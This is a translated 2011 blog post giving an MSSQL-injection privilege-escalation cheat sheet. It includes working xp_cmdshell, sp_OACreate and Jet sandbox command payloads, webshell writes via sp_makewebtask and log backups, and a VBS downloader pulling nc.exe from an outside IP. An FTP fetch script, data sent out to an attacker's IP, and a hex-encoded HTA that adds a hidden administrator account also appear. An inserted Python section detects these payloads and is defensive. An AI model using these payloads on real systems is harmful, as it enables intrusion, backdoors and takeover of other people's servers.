Some methods of privilege escalation via MSSQL injection

Posted by hbu_dcf on 2011-01-20


Approach to privilege escalation via MSSQL injection:
SA privileges: escalate directly through stored procedures such as XP_CMDSHELL and Sp_OACreate (provided those stored procedures are still present).
Related SQL statements
XP_CMDSHELL:
Numeric type: ;EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--
String and search types: ';EXEC MASTER.DBO.XP_CMDSHELL 'CMDLINE'--
Sp_OACreate:
Numeric type: ;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c cmdline'--
String and search types: ';declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c cmdline'--
P.S. On Windows 2000 systems, replace WINDOWS with WINNT in the path.

Sandbox-mode escalation:
Enable sandbox mode: ;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1--
Then execute system commands through jet.oledb: ;select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("cmd.exe /c cmdline")')--
P.S. On Windows 2000 systems, replace WINDOWS with WINNT in the path.

Write a one-line webshell directly (WEB絕對路徑 stands for the absolute path of the web directory): ;exec sp_makewebtask 'WEB絕對路徑/fuck.asp',' select ''<%25execute(request("a"))%25>'' ';--
P.S. The web server and the database must be on the same host, and the web directory must be known.

Ways to download a file to the target host:
Write a VBS file using a tool such as NBSI:
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://125.113.114.49/nc.exe^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"c:/c.exe^",2 >c:/labeng.vbs
What this statement does: it writes a VBS file named labeng to the C: drive;
then run CSCRIPT C:/LABENG.VBS. What the VBS file does: it downloads http://125.113.114.49/nc.exe to C:/C.EXE;

FTP & TFTP transfer:
FTP:
Enter the following in CMDLINE, one command at a time:
ECHO FTP>FTP.TXT
ECHO OPEN 125.*.*.*>>FTP.TXT
ECHO USERNAME>>FTP.TXT
ECHO PASSWORD>>FTP.TXT
ECHO GET XX.EXE>>FTP.TXT
ECHO BYE>>FTP.TXT
Effect: writes a file FTP.TXT with the contents
FTP
OPEN 125.*.*.*
USERNAME
PASSWORD
GET XX.EXE
BYE
Then run FTP -S:FTP.TXT and the target host will download XX.EXE from 125.*.*.*;
TFTP works similarly.

DB privileges:
Web and database on the same host:
1. List directories to locate the web directory, obtain a webshell via a LOG or differential backup, then escalate.
2. Guess table names to obtain the administrator ID and password, log in to the admin backend and obtain a webshell.
3. Back up an escalation statement into the startup folder and wait for a reboot.
When web and database are on separate hosts:
1. Guess table names to obtain the administrator ID and password, log in to the admin backend and obtain a webshell.
2. Back up an escalation statement into the startup folder and wait for a reboot.

Determining the database host's IP:
Locally, run NC -L -V -P 1433 to listen on port 1433, then inject the following (自己的IP stands for your own IP):
;insert into opendatasource('sqloledb','server=自己的IP;uid=test;pwd=test;database=test').test.dbo.ku select name from master.dbo.sysdatabases--

Exposing the web path (P.S. database and web on the same host):
;create table labeng(lala nvarchar(255) null)--
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into labeng (lala) values(@result);--
;and 1=(select count(*) from labeng where lala>1)-- or ;and 1=(select top 1 lala from labeng)--

Handling a filtered single quote (SQL語句的十六進位制數 stands for the hexadecimal encoding of the SQL statement):
;DECLARE @S VARCHAR(4000);SET @S=CAST(SQL語句的十六進位制數 AS VARCHAR(4000));EXEC(@S)--
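As an added example that is not part of the original post, the following Python normalizer and indicator matcher shows why a filter that only blocks the single quote misses this hex-wrapped form: it reverses the %25 URL-encoding and the CAST(0x... AS VARCHAR) wrapping before looking for the stored procedures and constructs this page relies on, so a defender can run it over request parameters or SQL audit text. The indicator names and the sample parameters are constructed here.

```python
import re
from urllib.parse import unquote

# Constructs this page relies on, matched against the normalized parameter text.
# A hit is an indicator to alert on, not proof, so the matched names are returned.
INDICATORS = {
    "xp_cmdshell": r"\bxp_cmdshell\b",
    "ole_automation": r"\bsp_oa(create|method)\b",
    "jet_sandbox": r"\bxp_regwrite\b|microsoft\.jet\.oledb",
    "makewebtask": r"\bsp_makewebtask\b",
    "log_backup_to_disk": r"\bbackup\s+log\b.*\bto\s+disk\b",
    "distributed_query": r"\bopen(rowset|datasource)\b",
    "registry_read": r"\bxp_regread\b",
    "add_sysadmin": r"\bsp_addsrvrolemember\b",
    "dynamic_exec": r"\bexec\s*\(",
}
HEX_LITERAL = re.compile(r"0x(?:[0-9a-fA-F]{2})+")

def decode_hex_literals(text: str) -> str:
    """Expand 0x... literals so a CAST(0x... AS VARCHAR) wrapper cannot hide keywords."""
    return HEX_LITERAL.sub(lambda m: bytes.fromhex(m.group(0)[2:]).decode("latin-1"), text)

def normalize(param: str) -> str:
    """URL-decode until stable (the page's payloads use %25 for '%'), expand hex, fold whitespace."""
    cur, prev = param, None
    while cur != prev:
        prev, cur = cur, unquote(cur)
    cur = decode_hex_literals(cur)
    cur = re.sub(r"/\*.*?\*/", " ", cur)  # inline comments are another common keyword splitter
    return re.sub(r"\s+", " ", cur).lower()

def classify(param: str) -> list[str]:
    """Return the sorted indicator names found in one request parameter."""
    norm = normalize(param)
    return sorted(name for name, pat in INDICATORS.items() if re.search(pat, norm))

# Constructed samples (not from any real log): the plain payload, the same payload wrapped
# in the page's hex CAST trick, a URL-encoded OLE Automation call, and a benign value.
SAMPLES = {
    "plain": "';EXEC MASTER.DBO.XP_CMDSHELL 'dir'--",
    "hex_wrapped": ";DECLARE @S VARCHAR(4000);SET @S=CAST(0x"
                   + "exec master..xp_cmdshell 'dir'".encode().hex()
                   + " AS VARCHAR(4000));EXEC(@S)--",
    "url_encoded": "%27%3Bdeclare%20%40shell%20int%20exec%20sp_oacreate%20%27wscript.shell%27--",
    "benign": "O'Brien",
}

if __name__ == "__main__":
    for label, value in SAMPLES.items():
        print(f"{label:12s} -> {classify(value)}")
```

A keyword list like this is only a first-line signal; on the server side, disabling xp_cmdshell, Ole Automation Procedures and ad hoc distributed queries removes the primitives these payloads depend on.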

LOG backup statements (表 stands for the database name, WEB目錄 for the web directory):
;alter database 表 set RECOVERY FULL--
;create table cmd (a image)--
;backup log 表 to disk = 'c:/Sammy' with init--
;insert into cmd (a) values ('<%%25Execute(request("value"))%%25>')--
;backup log 表 to disk = 'WEB目錄/1.asp'--

One-liner webshell variants:
a).<%%25Execute(request("go"))%%25>
b).<%Execute(request("go"))%>
c).%><%execute request("go")%><%
d).<script language=VBScript runat=server>execute request("sb")</Script>
e).<%25Execute(request("l"))%25>

Backing up a file into the startup folder:
Replace '<%%25Execute(request("value"))%%25>' in the LOG backup statements above with the hexadecimal content of an HTA, BAT or similar file.

Example: labeng.hta
Contents:
<SCRIPT LANGUAGE="VBScript">
on error resume next
Set WS = createobject("WScript.Shell")
WS.run "cmd /c net1.exe user test$ labeng?123 /add & net1.exe localgroup administrators test$ /add & del labeng.hta",0
</script><script language=javascript>window.close();</script>
-----------------------------------------------------------------------------
Converted to hexadecimal (the resulting hex string is the value used in the SQL statement below):
-----------------------------------------------------------------------------
SQL statement:
;insert into cmd (a) values(0x3C534352495054204C414E47554147453D225642536372697074223E0D0A6F6E206572726F7220726573756D65206E6578740D0A536574205753203D206372656174656F626A6563742822575363726970742E5368656C6C22290D0A57532E72756E2022636D64202F63206E6574312E6578652075736572207465737424206C6162656E673F313233202F6164642026206E6574312E657865206C6F63616C67726F75702061646D696E6973747261746F7273207465737424202F61646420262064656C206C6162656E672E687461222C300D0A3C2F7363726970743E3C736372697074206C616E67756167653D6A6176617363726970743E77696E646F772E636C6F736528293B3C2F7363726970743E0D0A0D0A0D0A)--

------------------------------------------------------------------------------------
Promoting a SQL user to SA privileges:
<SCRIPT LANGUAGE="VBScript">
on error resume next
Set WS = createobject("WScript.Shell")
WS.run "cmd /c echo exec master.dbo.sp_addsrvrolemember boayo,sysadmin>c:/test.qry & isql -E /U alma /P /i c:/test.qry & del labeng.hta",0
</script><script language=javascript>window.close();</script>
Usage is the same as above.
